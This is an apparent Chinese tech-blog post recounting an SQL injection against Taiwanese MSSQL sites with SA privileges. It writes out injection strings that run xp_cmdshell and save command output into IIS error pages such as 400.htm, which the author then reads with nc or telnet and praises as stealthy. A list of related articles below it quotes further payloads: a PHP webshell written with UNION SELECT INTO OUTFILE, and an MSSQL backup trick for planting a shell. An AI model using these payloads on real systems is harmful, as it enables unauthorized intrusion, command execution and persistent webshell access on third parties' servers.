MSSQL获取WEbshell把结果输出到400.HTM

最新推荐文章于 2022-03-25 09:54:26 发布
最新推荐文章于 2022-03-25 09:54:26 发布
阅读量364 收藏
点赞数
分类专栏: Safe 文章标签: iis system asp sql

把结果输出到400.HTM   [ 2005.1.23 ]

碰到几个台湾的SQL注入点,SA的用户。遮屏了返回信息,TCP/IP筛选开启。NBSI不能用,大概语句有冲突。

首先手工的注入得到
id=605;exec master..xp_cmdshell 'net start >%25windir%25/help/iisHelp/common/404b.htm。
然后打开个不存在的页面,居然返回“出错了哦~~页面找不到了嘛……”
我晕。这么亲切暧昧的,但是我不吃这套
经过0.0001秒的思考之后,我想到了nc,想到了IIS 400 BAD REQUEST。
这种方法的好处是,如果ASP或者IIS遮屏了默认的404 NOT FOUND页面,那么就可以利用这种方法从BAD REQUEST里得到。

id=605;exec master..xp_cmdshell 'net start >%25windir%25/help/iisHelp/common/400.htm。

然后用NC或者TELNET连接,随便写一些字符,然后回车。
得到了返回的内容。这个不错~呵呵,而且404的弊端在于出现的几率很高。很多人都可能看见。而400很少出现。。。这个就是隐蔽性。OK

完了后突然想到这句话,如果给了你SYSTEM权限你还搞不定,你还是别混了。呵呵(好象之前没人说过)

qzxdh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SQL]SQL注入-ASP漏洞全接触--入门篇
11-23 747
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是从正常的WW
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
SQL注入写入Webshell
weixin_43749601的博客
03-28 2780
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否写入webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
MSSQL数据导入导出基本方法
深南大道
06-01 3673
/*=================== 导入/导出 Excel 的基本方法 ===================*/ 从Excel文件中,导入数据到SQL数据库中,很简单,直接用下面的语句: /*===================================================================*/ --如果接受数据导入的表已经存在 ins
mssql差异备份拿shell
一个码农的笔记
03-08 5314
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
利用 mssql backup 创建webshell
Y1ch0的专栏
12-01 991
最早想到利用数据库系统来写文件大约MySQL下面的事情吧,我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的,第一步,也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。ACCESS功能不那么强大,有注入漏洞的时候也不能直接获得执行任何命令的权限,就不说了;MSSQL倒是有很多人详细研究过,执行命令的方法罗列了很多,可是没有了exec的权限,所做的还是有限。很多
用MySql备份得到WebShell.pdf
10-10
用MySql备份得到WebShell.pdf
WebShell管理中心箱子3.0源码.zip
最新发布
06-17
WebShell管理中心箱子3.0源码,系统采用PHP+MySql搭建 ,数据采用了PhpCms的加密方式,可靠性高 ,全局防注入、XSS等...2.执行webshell.sql文件 3.上传到网站根目录 4.访问/admin 5.用admin admin登陆 6.修改密码
WebShell-Password(433616).txt
05-12
WebShell-Password(433616)
webshell 攻与防kill_webshell_detect-master.zip
07-25
最近几个月中,参加过很多webshell检测的比赛,有我们内部的,也有其他厂商的,平心而论,TSRC和 青藤云针对webshell|文件的检测思路和实现成熟度是业界领先的,使用动静态污点分析webshell文件,已经是非常高级的...
sql注入中常见的报错信息
sun的博客
10-21 4649
sql注入是我们常见的ctf的web类型题目,因此我们在做这类题时经常会在页面上返回错误信息,因此熟悉一些常见的sql注入信息是很重要的,下面我介绍一些自己常遇到的mysql报错信息。 我们在页面上返回的错误信息不仅仅只有mysql返回的,可能还有服务器返回的,因此我仅仅对mysql返回的错误信息进行总结 . 1,报错信息 The used SELECT statements...
sql注入小结
Ciyaso的博客
07-13 131
数字型注入 可以用 id=2 与 id=3-1 返回的页面是否相同来判断是否是数字型 联合注入 ?id=1' order by 1 --+ ?id=1' order by 2 --+ ?id=1' order by 3 --+ …… ↑直至返回报错,可以判断出列数↑ ?id=1' union select database(),2,3 --+ ?id=1' union select 1,database(),3 --+ ?id=1' union select 1,2,database() --+ ↑哪个
SQL注入写webshell
huangyongkang666的博客
03-25 2695
SQL注入写webshell 1.MySQLshell 写入WebShell的几种方式 1、利用Union select 写入 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
三大数据库如何写入WebShell?|美创安全实验室
美创科技的博客
08-14 1187
WebShell作为黑客常用来提权的工具,通常出现在存在任意文件上传漏洞的网站中,但如果遇到一个没有任何的上传点的网站,想通过文件上传漏洞获得权限显然就行不通了,但所谓“山穷水尽疑无路,柳暗花明又一村”,此时一个SQL注入点摆在你眼前,你能否珍惜这来之不易的机会,拿到WebShell呢? 本期美创安全实验室将带大家了解,如何通过三大数据库(MySQLSqlServer、Oracle)获取网站的WebShell。 MySQL写入WebShell 01必备条件 想要成功向MySQL写入WebSh.
mysql 备份getshell_sqlserver的两种备份getshell(干货)
weixin_28691003的博客
02-27 527
log备份这是一种导出日志文件到web路径来getshell的方法本次简述一下通过sqlserver进行getshell的两种方法,payload可以直接拿来用,话不多说,直接往下看就完事了优势:1、重复性好,多次备份的成功率高2、相对于差异备份而言,shell的体积较小利用条件:至少DBO权限1、前提得知绝对路径,并且可写2、站库不分离3、数据库必须被备份过一次第一步:;alter databa...
sql注入总结
wuqiongrj的博客
07-22 7687
本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html   Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的   sql注入分类: 基于联
自动化运维平台(日志实时刷新到web界面)
weixin_34217773的博客
04-16 3261
针对前面两篇博客的续写,主体的都写的差不多了,但是实际真正的功能并没有写。功能按钮如下:分支显示,打包,重启。实时刷新到web的整体思路:当点击分支显示时,做的操作是,把服务名发送到后端,然后调用shell执行git相关命令的操作,将所有分支实时显示到web界面上,然后通过点击触发事件将分支名加到vuex中对应的服务名后面的branch字段中,此时public公共组件里面的w...
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
批量获取webshell的思路
03-31
4. 自行编写webshell:根据目标网站的环境和漏洞特性,编写符合要求的webshell,尝试上传到目标网站。 5. 社会工程学:通过社会工程学手段,例如钓鱼、欺骗、诱骗等,获取目标网站管理员或其他有权限的用户的账号和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值